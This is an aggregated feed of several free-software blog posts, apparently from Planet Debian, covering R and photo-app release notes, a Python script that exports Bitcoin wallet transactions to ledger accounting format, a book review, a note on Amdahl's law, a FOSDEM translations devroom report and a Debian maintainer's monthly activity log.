<p>This release, the first since 2021, brings a number of enhancments.
In particular, the summary function is now improved in several ways. <a href="https://github.com/joshuaulrich/">Josh</a> also put in a nice PR
that generalizes some setup defaults and values.</p>
<p>The release is summarised in the NEWS entry:</p>
<blockquote>
<h4 id="changes-in-prrd-version-0.0.6-2024-03-06">Changes in prrd
version 0.0.6 (2024-03-06)</h4>
<ul>
<li><p>The summary function has received several enhancements:</p>
<ul>
<li><p>Extended summary is only running when failures are seen.</p></li>
<li><p>The <code>summariseQueue</code> function now displays an
anticipated completion time and remaining duration.</p></li>
<li><p>The use of optional package <span class="pkg">foghorn</span> has
been refined, and refactored, when running summaries.</p></li>
</ul></li>
<li><p>The <code>dequeueJobs.r</code> scripts can receive a date
argument, the date can be parse via <code>anydate</code> if <span class="pkg">anytime</span> ins present.</p></li>
<li><p>The <code>enqueeJobs.r</code> now considers skipped package when
running 'addfailed' while ensuring selecting packages are still on
CRAN.</p></li>
<li><p>The CI setup has been updated (twice),</p></li>
<li><p>Enqueing and dequing functions and scripts now support relative
directories, updated documentation (<a href="https://github.com/eddelbuettel/prrd/pull/18">#18</a> by Joshua
Ulrich).</p></li>
</ul>
</blockquote>
<p>Courtesy of my <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>, there
is also a diffstat report for <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/06#prrd_0.0.6">this
release</a>.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>Dirk Eddelbuettelhttp://dirk.eddelbuettel.com/blogPlain text accounting file from your bitcoin transactionshttps://people.skolelinux.org/pere/blog/Plain_text_accounting_file_from_your_bitcoin_transactions.html2024-03-07T17:00:00+00:00<p>A while back I wrote a small script to extract the Bitcoin
transactions in a wallet in the
ledger plain text accounting
format. The last few days I spent some time to get it working
better with more special cases. In case it can be useful for others,
here is a copy:</p>
<p></p><blockquote><pre>#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (c) 2023-2024 Petter Reinholdtsen
from decimal import Decimal
import json
import subprocess
import time
import numpy
def format_float(num):
return numpy.format_float_positional(num, trim='-')
accounts = {
u'amount' : 'Assets:BTC:main',
}
addresses = {
'' : 'Assets:bankkonto',
'' : 'Assets:bankkonto',
}
def exec_json(cmd):
proc = subprocess.Popen(cmd,stdout=subprocess.PIPE)
j = json.loads(proc.communicate()[0], parse_float=Decimal)
return j
def list_txs():
# get all transactions for all accounts / addresses
c = 0
txs = []
txidfee = {}
limit=100000
cmd = ['bitcoin-cli', 'listtransactions', '*', str(limit)]
if True:
txs.extend(exec_json(cmd))
else:
# Useful for debugging
with open('transactions.json') as f:
txs.extend(json.load(f, parse_float=Decimal))
#print txs
for tx in sorted(txs, key=lambda a: a['time']):
# print tx['category']
if 'abandoned' in tx and tx['abandoned']:
continue
if 'confirmations' in tx and 0 >= tx['confirmations']:
continue
when = time.strftime('%Y-%m-%d %H:%M', time.localtime(tx['time']))
if 'message' in tx:
desc = tx['message']
elif 'comment' in tx:
desc = tx['comment']
elif 'label' in tx:
desc = tx['label']
else:
desc = 'n/a'
print("%s %s" % (when, desc))
if 'address' in tx:
print(" ; to bitcoin address %s" % tx['address'])
else:
print(" ; missing address in transaction, txid=%s" % tx['txid'])
print(f" ; amount={tx['amount']}")
if 'fee'in tx:
print(f" ; fee={tx['fee']}")
for f in accounts.keys():
if f in tx and Decimal(0) != tx[f]:
amount = tx[f]
print(" %-20s %s BTC" % (accounts[f], format_float(amount)))
if 'fee' in tx and Decimal(0) != tx['fee']:
# Make sure to list fee used in several transactions only once.
if 'fee' in tx and tx['txid'] in txidfee \
and tx['fee'] == txidfee[tx['txid']]:
True
else:
fee = tx['fee']
print(" %-20s %s BTC" % (accounts['amount'], format_float(fee)))
print(" %-20s %s BTC" % ('Expences:BTC-fee', format_float(-fee)))
txidfee[tx['txid']] = tx['fee']
if 'address' in tx and tx['address'] in addresses:
print(" %s" % addresses[tx['address']])
else:
if 'generate' == tx['category']:
print(" Income:BTC-mining")
else:
if amount < Decimal(0):
print(f" Assets:unknown:sent:update-script-addr-{tx['address']}")
else:
print(f" Assets:unknown:received:update-script-addr-{tx['address']}")
print()
c = c + 1
print("# Found %d transactions" % c)
if limit == c:
print(f"# Warning: Limit {limit} reached, consider increasing limit.")
def main():
list_txs()
main()
</pre></blockquote><p></p>
<p>It is more of a proof of concept, and I do not expect it to handle
all edge cases, but it worked for me, and perhaps you can find it
useful too.</p>
<p>To get a more interesting result, it is useful to map accounts sent
to or received from to accounting accounts, using the
<tt>addresses</tt> hash. As these will be very context dependent, I
leave out my list to allow each user to fill out their own list of
accounts. Out of the box, 'ledger reg BTC:main' should be able to
show the amount of BTCs present in the wallet at any given time in the
past. For other and more valuable analysis, a account plan need to be
set up in the <tt>addresses</tt> hash. Here is an example
transaction:</p>
<p></p><blockquote><pre>2024-03-07 17:00 Donated to good cause
Assets:BTC:main -0.1 BTC
Assets:BTC:main -0.00001 BTC
Expences:BTC-fee 0.00001 BTC
Expences:donations 0.1 BTC
</pre></blockquote><p></p>
<p>It need a running Bitcoin Core daemon running, as it connect to it
using <tt>bitcoin-cli listtransactions * 100000</tt> to extract the
transactions listed in the Wallet.</p>
<p>As usual, if you use Bitcoin and want to show your support of my
activities, please send Bitcoin donations to my address
<b><a>15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b</a></b>.</p>Petter Reinholdtsenhttps://people.skolelinux.org/pere/blog/Phosh Nightly Package Buildshttps://phosh.mobi/posts/phosh-nightly/2024-03-07T14:19:30+00:00Tightening the feedback loop Link to heading One thing we notice ever so often is that although Phosh’s source code is publicly available and upcoming changes are open for review the feedback loop between changes being made to the development branch and users noticing the change can still be quiet long.
This can be problematic as we ideally want to catch a regression or broken use case triggered by a change on the development branch (aka main) before the general availability of a new version.Guido Güntherhttps://phosh.mobi/tags/planetdebian/Constructed truths — truth and knowledge in a post-truth worldhttps://gwolf.org/2024/03/constructed-truths-truth-and-knowledge-in-a-post-truth-world.html2024-03-07T01:08:10+00:00<blockquote>
This post is a review for <a href="https://www.computingreviews.com/">Computing Reviews</a>
for <em><a href="https://link.springer.com/book/10.1007/978-3-658-39942-9">Constructed truths — truth and knowledge in a post-truth world</a></em>
, a book
published in <em><a href="https://www.computingreviews.com/review/review_review.cfm?review_id=147722">Springer Link</a></em>
</blockquote>
<p>Many of us grew up used to having some news sources we could implicitly trust, such as well-positioned newspapers and radio or TV news programs. We knew they would only hire responsible journalists rather than risk diluting public trust and losing their brand’s value. However, with the advent of the Internet and social media, we are witnessing what has been termed the “post-truth” phenomenon. The undeniable freedom that horizontal communication has given us automatically brings with it the emergence of filter bubbles and echo chambers, and truth seems to become a group belief.</p>
<p>Contrary to my original expectations, the core topic of the book is not about how current-day media brings about post-truth mindsets. Instead it goes into a much deeper philosophical debate: What is truth? Does truth exist by itself, objectively, or is it a social construct? If activists with different political leanings debate a given subject, is it even possible for them to understand the same points for debate, or do they truly experience parallel realities?</p>
<p>The author wrote this book clearly prompted by the unprecedented events that took place in 2020, as the COVID-19 crisis forced humanity into isolation and online communication. Donald Trump is explicitly and repeatedly presented throughout the book as an example of an actor that took advantage of the distortions caused by post-truth.</p>
<p>The first chapter frames the narrative from the perspective of information flow over the last several decades, on how the emergence of horizontal, uncensored communication free of editorial oversight started empowering the “netizens” and created a temporary information flow utopia. But soon afterwards, “algorithmic gatekeepers” started appearing, creating a set of personalized distortions on reality; users started getting news aligned to what they already showed interest in. This led to an increase in polarization and the growth of narrative-framing-specific communities that served as echo chambers for disjoint views on reality. This led to the growth of conspiracy theories and, necessarily, to the science denial and pseudoscience that reached unimaginable peaks during the COVID-19 crisis. Finally, when readers decide based on completely subjective criteria whether a scientific theory such as global warming is true or propaganda, or question what most traditional news outlets present as facts, we face the phenomenon known as “fake news.” Fake news leads to “post-truth,” a state where it is impossible to distinguish between truth and falsehood, and serves only a rhetorical function, making rational discourse impossible.</p>
<p>Toward the end of the first chapter, the tone of writing quickly turns away from describing developments in the spread of news and facts over the last decades and quickly goes deep into philosophy, into the very thorny subject pursued by said discipline for millennia: How can “truth” be defined? Can different perspectives bring about different truth values for any given idea? Does truth depend on the observer, on their knowledge of facts, on their moral compass or in their honest opinions?</p>
<p>Zoglauer dives into epistemology, following various thinkers’ ideas on what can be understood as truth: constructivism (whether knowledge and truth values can be learnt by an individual building from their personal experience), objectivity (whether experiences, and thus truth, are universal, or whether they are naturally individual), and whether we can proclaim something to be true when it corresponds to reality. For the final chapter, he dives into the role information and knowledge play in assigning and understanding truth value, as well as the value of second-hand knowledge: Do we really “own” knowledge because we can look up facts online (even if we carefully check the sources)? Can I, without any medical training, diagnose a sickness and treatment by honestly and carefully looking up its symptoms in medical databases?</p>
<p>Wrapping up, while I very much enjoyed reading this book, I must confess it is completely different from what I expected. This book digs much more into the abstract than into information flow in modern society, or the impact on early 2020s politics as its editorial description suggests. At 160 pages, the book is not a heavy read, and Zoglauer’s writing style is easy to follow, even across the potentially very deep topics it presents. Its main readership is not necessarily computing practitioners or academics. However, for people trying to better understand epistemology through its expressions in the modern world, it will be a very worthy read.</p>Gunnar Wolfhttps://gwolf.orgReverse Amdahl's Lawhttp://blog.sesse.net/blog/tech/2024-03-06-17-39_reverse_amdahls_law.html2024-03-06T16:39:00+00:00<p>Everybody working in performance knows <a href="https://en.wikipedia.org/wiki/Amdahl%27s_law">Amdahl's law</a>,
and it is usually framed as a negative result; if you optimize
(in most formulations, parallelize) a part of an operation,
you gain diminishing results after a while. (When optimizing a
given fraction p of the total time T by a speedup factor s,
the new time taken is (1-p)T + pT/s.)</p>
<p>However, Amdahl's law also works beautifully in reverse!
When you optimize something, there's usually some limit where
a given optimization isn't worth it anymore; I usually put this
around 1% or so, although of course it varies with the cost of
the optimization and such. (Most people would count 1% as ridiculously
low, but it's usually how mature systems go; you rarely find
single 30% speedups, but you can often find ten smaller speedups and apply
them sequentially. SQLite famously <a href="https://www.sqlite.org/cpu.html">tripled their speed</a>
by chaining optimizations so tiny that they needed to run in a simulator
to measure them.) And as your total runtime becomes smaller,
things that used to not be worth it now pop over that threshold!
If you have enough developer resources and no real upper limit
for how much performance you would want, you can keep going forever.</p>
<p>A different way to look at it is that optimizations give you
compound interest; if measuring in terms of throughput instead
of latency (i.e., items per second instead of seconds per item),
which I contend is the only reasonable way to express performance
percentages, you can simply multiply the factors together.[1] So 1%
and then 1% means 1.01 * 1.01 = 1.0201 = 2.01% speedup and not
2%. Thirty 1% optimizations sum to 34.8%, not 30%.</p>
<p>So here's my formulation of Amdahl's law, in a more positive
light: The more you speed up a given part of a system, the more
impactful optimizations in the other parts will be. So go forth
and fire up those profilers :-)</p>
<p>[1] Obviously throughput measurements are inappropriate if
what you care about is e.g. 99p latency. It is still better to
talk about a 50% speedup than removing 33% of the latency,
though, especially as the speedup factor gets higher.</p>Steinar H. Gundersonhttp://blog.sesse.net/Bits from FOSDEM 2023 and 2024http://phls.com.br/bits-from-fosdem-2023-and-20242024-03-04T23:50:00+00:00<p><a href="https://phls.com.br/minha-participacao-nos-fosdem-2023-e-2024">Link para versão em português</a></p>
<h1 id="intro">Intro</h1>
<p>Since 2019, I have traveled to Brussels at the beginning of the year to join <a href="https://fosdem.org/2024/">FOSDEM</a>, considered the largest and most important Free Software event in Europe. The 2024 edition was the fourth in-person edition in a row that I joined (2021 and 2022 did not happen due to COVID-19) and always with the financial help of Debian, which kindly paid my flight tickets after receiving my request asking for help to travel and approved by the Debian leader.</p>
<p>In 2020 I wrote <a href="https://phls.com.br/viagem-de-curitiba-para-bruxelas">several posts</a> with a very complete report of the days I spent in Brussels. But in 2023 I didn’t write anything, and becayse last year and this year I coordinated a room dedicated to translations of Free Software and Open Source projects, I’m going to take the opportunity to write about these two years and how it was my experience.</p>
<p>After my first trip to FOSDEM, I started to think that I could join in a more active way than just a regular attendee, so I had the desire to propose a talk to one of the rooms. But then I thought that instead of proposing a tal, I could organize a room for talks :-) and with the topic “translations” which is something that I’m very interested in, because it’s been a few years since I’ve been helping to translate the Debian for Portuguese.</p>
<h1 id="joining-fosdem-2023">Joining FOSDEM 2023</h1>
<p>In the second half of 2022 I did some research and saw that there had never been a room dedicated to translations, so when the FOSDEM organization opened the <a href="https://archive.fosdem.org/2023/news/2022-09- 29-call_for_devrooms/">call</a> to receive room proposals (called DevRoom) for the 2023 edition, I sent a proposal to a translation room and it was <a href="https://archive.fosdem.org/2023/news /2022-11-07-accepted-developer-rooms/">accepted</a>!</p>
<p>After the room was confirmed, the next step was for me, as room coordinator, to publicize the <a href="https://lists.fosdem.org/pipermail/fosdem/2022q4/003441.html">call for talk proposals</a>. I spent a few weeks hoping to find out if I would receive a good number of proposals or if it would be a failure. But to my happiness, I received eight proposals and I had to select six to schedule the <a href="https://archive.fosdem.org/2023/schedule/track/translations/">room programming schedule</a> due to time constraints .</p>
<p><a href="https://archive.fosdem.org/2023">FOSDEM 2023</a> took place from February 4th to 5th and the translation devroom was scheduled on the second day in the afternoon.</p>
<p><img alt="Fosdem 2023" src="https://phls.com.br/assets/img/fosdem-2023-063.jpg" /></p>
<p>The talks held in the room were these below, and in each of them you can watch the recording video.</p>
<ul>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_welcome_to_the_translations_devroom/">Welcome to the Translations DevRoom</a>.
<ul>
<li>Paulo Henrique de Lima Santana</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_translate_all_the_things/">Translate All The Things!</a> An Introduction to LibreTranslate.
<ul>
<li>Piero Toffanin</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_bringing_your_project_closer_to_users_translating_libre_with_weblate/">Bringing your project closer to users - translating libre with Weblate</a>. News, features and plans of the project.
<ul>
<li>Benjamin Alan Jamie</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_20_years_with_gettext/">20 years with Gettext</a>. Experiences from the PostgreSQL project.
<ul>
<li>Peter Eisentraut</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_building_an_atractive_way_in_an_old_infra_for_new_translators/">Building an atractive way in an old infra for new translators</a>.
<ul>
<li>Texou</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_managing_kdes_translation_project/">Managing KDE’s translation project</a>. Are we the biggest FLOSS translation project?
<ul>
<li>Albert Astals Cid</li>
</ul>
</li>
<li><a href="https://archive.fosdem.org/2023/schedule/event/translations_translating_documentation_with_cloud_tools_and_scripts/">Translating documentation with cloud tools and scripts</a>. Using cloud tools and scripts to translate, review and update documents.
<ul>
<li>Nilo Coutinho Menezes</li>
</ul>
</li>
</ul>
<p>And on the first day of FOSDEM I was at the Debian stand selling the t-shirts that I had taken from Brazil. People from France were also there selling other products and it was cool to interact with people who visited the booth to buy and/or talk about Debian.</p>
<p><br />
<img alt="Fosdem 2023" src="https://phls.com.br/assets/img/fosdem-2023-016.jpg" />
<br /><br />
<img alt="Fosdem 2023" src="https://phls.com.br/assets/img/fosdem-2023-019.jpg" />
<br /></p>
<p><a href="https://photos.app.goo.gl/fB6wH37b2pFBqiNZ9">Photos</a></p>
<h1 id="joining-fosdem-2024">Joining FOSDEM 2024</h1>
<p>The 2023 result motivated me to propose the translation devroom again when the FOSDEM 2024 organization opened the <a href="https://fosdem.org/2024/news/2023-09-29-devrooms-cfp/">call for rooms</a> . I was waiting to find out if the FOSDEM organization would accept a room on this topic for the second year in a row and to my delight, my proposal was <a href="https://fosdem.org/2024/news/2023-11-08- devrooms-announced/">accepted</a> again :-)</p>
<p>This time I received 11 proposals! And again due to time constraints, I had to select six to schedule the <a href="https://fosdem.org/2024/schedule/track/translations/">room schedule grid</a>.</p>
<p><a href="https://fosdem.org/2024/">FOSDEM 2024</a> took place from February 3rd to 4th and the translation devroom was scheduled for the second day again, but this time in the morning.</p>
<p>The talks held in the room were these below, and in each of them you can watch the recording video.</p>
<ul>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3516-welcome-to-the-translations-devroom/">Welcome to the Translations DevRoom</a>.
<ul>
<li>Paulo Henrique de Lima Santana</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2624-localization-of-open-source-tools-into-swahili/">Localization of Open Source Tools into Swahili</a>.
<ul>
<li>Cecilia Maundu</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-1759-a-universal-data-model-for-localizable-messages/">A universal data model for localizable messages</a>.
<ul>
<li>Eemeli Aro</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3236-happy-translating-it-is-possible-to-overcome-the-language-barrier-in-open-source-/">Happy translating! It is possible to overcome the language barrier in Open Source!</a>
<ul>
<li>Wentao Liu</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-1906-lessons-learnt-as-a-translation-contributor-the-past-4-years/">Lessons learnt as a translation contributor the past 4 years</a>.
<ul>
<li>Tom De Moor</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-2071-long-term-effort-to-keep-translations-up-to-date/">Long Term Effort to Keep Translations Up-To-Date</a>.
<ul>
<li>Andika Triwidada</li>
</ul>
</li>
<li><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3348-using-open-source-ais-for-accessibility-and-localization/">Using Open Source AIs for Accessibility and Localization</a>.
<ul>
<li>Nevin Daniel</li>
</ul>
</li>
</ul>
<p>This time I didn’t help at the Debian stand because I couldn’t bring t-shirts to sell from Brazil. So I just stopped by and talked to some people who were there like some DDs. But I volunteered for a few hours to operate the streaming camera in one of the main rooms.</p>
<p><br />
<img alt="Fosdem 2024" src="https://phls.com.br/assets/img/fotos-fosdem-2024-037.jpg" />
<br /><br />
<img alt="Fosdem 2024" src="https://phls.com.br/assets/img/fotos-fosdem-2024-015.jpg" />
<br /></p>
<p><a href="https://photos.app.goo.gl/KrSvUFYTGkzb9kfz5">Photos</a></p>
<h1 id="conclusion">Conclusion</h1>
<p>The topics of the talks in these two years were quite diverse, and all the lectures were really very good. In the 12 talks we can see how translations happen in some projects such as KDE, PostgreSQL, Debian and Mattermost. We had the presentation of tools such as LibreTranslate, Weblate, scripts, AI, data model. And also reports on the work carried out by communities in Africa, China and Indonesia.</p>
<p>The rooms were full for some talks, a little more empty for others, but I was very satisfied with the final result of these two years.</p>
<p>I leave my special thanks to <a href="https://jonathancarter.org/">Jonathan Carter</a>, Debian Leader who approved my flight tickets requests so that I could join FOSDEM 2023 and 2024. This help was essential to make my trip to Brussels because flight tickets are not cheap at all.</p>
<p>I would also like to thank my wife Jandira, who has been my travel partner :-)</p>
<p><img alt="Bruxelas" src="https://phls.com.br/assets/img/bruxelas-2023-187.jpg" /></p>
<p>As there has been an increase in the number of proposals received, I believe that interest in the translations devroom is growing. So I intend to send the devroom proposal to FOSDEM 2025, and if it is accepted, wait for the future Debian Leader to approve helping me with the flight tickets again. We’ll see.</p>Paulo Henrique de Lima Santanahttp://phls.com.brFree software activity in January/February 2024tag:www.chiark.greenend.org.uk,2024-03-04:/~cjwatson/blog/activity-2024-02.html2024-03-04T10:39:50+00:00<p>Two months into my <a href="https://www.chiark.greenend.org.uk/~cjwatson/blog/going-freelance.html">new gig</a> and it’s going
great! <a href="https://www.chiark.greenend.org.uk/~cjwatson/blog/task-management.html">Tracking my time</a> has taken a bit of
getting used to, but having something that amounts to a queryable database
of everything I’ve done has also allowed some helpful introspection.</p>
<p>Freexian <a href="https://www.freexian.com/about/debian-contributions/">sponsors</a> up
to 20% of my time on Debian tasks of my choice. In fact I’ve been spending
the bulk of my time on
<a href="https://freexian-team.pages.debian.net/debusine/">debusine</a> which is itself
intended to accelerate work on Debian, but more details on that later.
While I contribute to Freexian’s
<a href="https://www.freexian.com/tags/debian-contributions/">summaries</a> now, I’ve
also decided to start writing monthly posts about my free software activity
as many others do, to get into some more detail.</p>
<h2>January 2024</h2>
<ul>
<li>I <a href="https://salsa.debian.org/ci-team/autopkgtest/-/merge_requests/272">added Incus
support</a>
to autopkgtest. <a href="https://linuxcontainers.org/incus/">Incus</a> is a system
container and virtual machine manager, forked from <a href="https://github.com/canonical/lxd">Canonical’s
<span class="caps">LXD</span></a>. I switched my laptop over to it
and then quickly found that it was inconvenient not to be able to run
Debian package test suites using
<a href="https://manpages.debian.org/man/autopkgtest">autopkgtest</a>, so I tweaked
autopkgtest’s existing <span class="caps">LXD</span> integration to support using either <span class="caps">LXD</span> or Incus.</li>
<li>I discovered <a href="https://metacpan.org/dist/Perl-Critic">Perl::Critic</a> and
used it to tidy up some poor practices in several of my packages,
including debconf. Perl used to be my language of choice but I’ve been
mostly using Python for over a decade now, so I’m not as fluent as I used
to be and some mechanical assistance with spotting common errors is
helpful; besides, I’m generally a big fan of applying static analysis to
everything possible in the hope of reducing bug density. Of course, this
did result in a couple of regressions
(<a href="https://salsa.debian.org/pkg-debconf/debconf/-/commit/4f8b9f969679fa4a38aca8da2702057ea861ffae">1</a>,
<a href="https://salsa.debian.org/pkg-debconf/debconf/-/commit/7274bf66e82b2557156813f93ed0592539a2ac1c">2</a>),
but at least we caught them fairly quickly.</li>
<li>I did some overdue debconf maintenance, mainly around tidying up error
message handling in several places (<a href="https://bugs.debian.org/797071">1</a>,
<a href="https://bugs.debian.org/754123">2</a>,
<a href="https://bugs.debian.org/682508">3</a>).</li>
<li>I did some routine maintenance to move several of my upstream projects to
a new <a href="https://www.gnu.org/software/gnulib/manual/html_node/Stable-Branches.html">Gnulib stable
branch</a>.</li>
<li><a href="https://salsa.debian.org/debian/debmirror">debmirror</a> includes a <a href="https://salsa.debian.org/debian/debmirror/-/blob/master/mirror_size">useful
summary</a>
of how big a Debian mirror is, but it hadn’t been updated since 2010 and
the script to do so had bitrotted quite badly. I <a href="https://salsa.debian.org/debian/debmirror/-/commit/7ae93742377d9205c57b7e47ef96d4663110f0ff">fixed
that</a>
and added a recurring task for myself to refresh this every six months.</li>
</ul>
<h2>February 2024</h2>
<ul>
<li>Some time back I added AppArmor and seccomp confinement to man-db. This
was mainly motivated by a desire to <a href="https://forum.snapcraft.io/t/support-for-man-pages/2299/24">support manual pages in
snaps</a> (which
is <a href="https://bugs.launchpad.net/snapd/+bug/1575593">still open</a> several
years later …), but since reading manual pages involves a <a href="https://www.gnu.org/software/groff/">non-trivial
text processing toolchain mostly written in
C++</a>, I thought it was reasonable to
assume that some day it might have a vulnerability even though its track
record has been good; so <code>man</code> now restricts the system calls that
<code>groff</code> can execute and the parts of the file system that it can access.
I stand by this, but it did cause some problems that have needed a
succession of small fixes over the years. This month I issued
<a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00001.html"><span class="caps">DLA</span>-3731-1</a>,
backporting some of those fixes to buster.</li>
<li>I spent some time chasing a <a href="https://bugs.debian.org/1063413">console-setup build
failure</a> following the removal of
kFreeBSD support, which was uploaded by mistake. I suggested a <a href="https://salsa.debian.org/holgerw/console-setup/-/merge_requests/1">set of
fixes</a>
for this, but the author of the change to remove kFreeBSD support decided
to take a different approach (fair enough), so I’ve abandoned this.</li>
<li>I updated the <a href="https://tracker.debian.org/pkg/zope.testrunner">Debian zope.testrunner
package</a> to 6.3.1.</li>
<li>openssh:<ul>
<li>A Freexian collaborator had a problem with automating installations
involving changes to <code>/etc/ssh/sshd_config</code>. This turned out to be
resolvable without any changes, but in the process of investigating I
noticed that my dodgy arrangements to avoid
<a href="https://manpages.debian.org/man/ucf">ucf</a> prompts in certain cases
had bitrotted slightly, which meant that some people might be prompted
unnecessarily. I <a href="https://salsa.debian.org/ssh-team/openssh/-/commit/b9671cc74475922fa61e9ebdba56ec84446d19ac">fixed this and arranged for it not to happen
again</a>.</li>
<li>Following a <a href="https://lists.debian.org/debian-devel/2024/02/msg00239.html">recent debian-devel
discussion</a>,
I realized that some particularly awkward code in the OpenSSH
packaging was now obsolete, and <a href="https://salsa.debian.org/ssh-team/openssh/-/commit/a6c7b9ef532489671e3a654ad38102cc30d94b5a">removed
it</a>.</li>
</ul>
</li>
<li>I backported a <a href="https://bugs.debian.org/1027387">python-channels-redis
fix</a> to bookworm. I wasn’t the first
person to run into this, but I rediscovered it while working on debusine
and it was confusing enough that it seemed worth fixing in stable.</li>
<li>I fixed a <a href="https://bugs.debian.org/1064699">simple build failure in
storm</a>.</li>
<li>I dug into a very confusing cluster of celery build failures
(<a href="https://bugs.debian.org/1056232">1</a>,
<a href="https://bugs.debian.org/1058317">2</a>,
<a href="https://bugs.debian.org/1063345">3</a>), and tracked the hardest bit down
to a <a href="https://github.com/python/cpython/issues/115874">Python 3.12
regression</a>, now fixed
in unstable thanks to Stefano Rivera. Getting celery back into testing
is blocked on the <a href="https://wiki.debian.org/ReleaseGoals/64bit-time">64-bit <code>time_t</code>
transition</a> for now, but
once that’s out of the way it should flow smoothly again.</li>
</ul>Colin Watsonhttps://www.chiark.greenend.org.uk/~cjwatson/blog/New corydalis 2024.9.0 release!https://k1024.org/posts/2024/2024-03-03-new-corydalis-release/2024-03-03T22:15:00+00:00<p>Obligatory and misused quote: <em>It’s not dead, Jim!</em></p>
<p>I’ve kind of dropped by ball lately on organising my own photo
collection, but February was a pretty good month and I managed to
write some more code for
<a href="https://github.com/iustin/corydalis">Corydalis</a>, ending up with the
aforementioned <a href="https://github.com/iustin/corydalis/releases/tag/v2024.9.0">new
release</a>.</p>
<p>The release is not a big one, but I did manage to solve one thing that
was annoying me <em>greatly</em>: that lack of ability to play videos inline
in one of the two picture viewing modes (in my preferred mode, in
fact). Now, whether you’re browsing through pictures, or looking at
pictures one-by-one, you can in both cases play videos easily, and to
some extent, “as it should be”. No user docs for that, yet (I actually
need to split the manual in user/admin/developer parts)</p>
<p>I did some more internal cleanups, and I’ve enabled building release
zips (since that’s how GitHub actions creates artifacts), which means
it should be 10% easier to test this. The rest 90% is configuring it
and pointing to picture folders and and and, so this is definitely not
plug-and-play.</p>
<p>The diff summary between <code>2023.44.0</code> and <code>2024.9.0</code> is: 56 files
changed, 1412 insertions(+), 700 deletions(-). Which is not bad, but
also not too much. The biggest churn was, as expected, in the viewer
(due to the aforementioned video playing). The “scary” part is that
the TypeScript code is not at 7.9% (and a tiny more JS, which I can’t
convert yet due to lack of type definitions upstream). I say scary in
quotes, because I would actually like to know Typescript better, but
no time.</p>
<p>The new release can be seen in action on
<a href="https://demo.corydalis.io">demo.corydalis.io</a>, and as always, just
after release I found two minor issues:</p>
<ul>
<li>The GitHub actions don’t retrieve the tags <a href="https://github.com/actions/checkout/issues/701">by
default</a>, actually
they didn’t use to retrieve tags at all, but that’s fixed now, just
needs configuration, so the public build just says “<em>Corydalis
fbe0088, built on Mar 3 2024.</em>” (which is the correct hash value, at
least).</li>
<li>I don’t have videos on the public web site, so the new functionality
is not visible. I’m not sure I want to add real videos
(size/bandwidth), hmm 🤨.</li>
</ul>
<p>Well, there will be future releases. For now, I’ve made an open-source
package release, which I didn’t do in a while, so I’m happy 😁. See
you!</p>Iustin Pophttps://k1024.org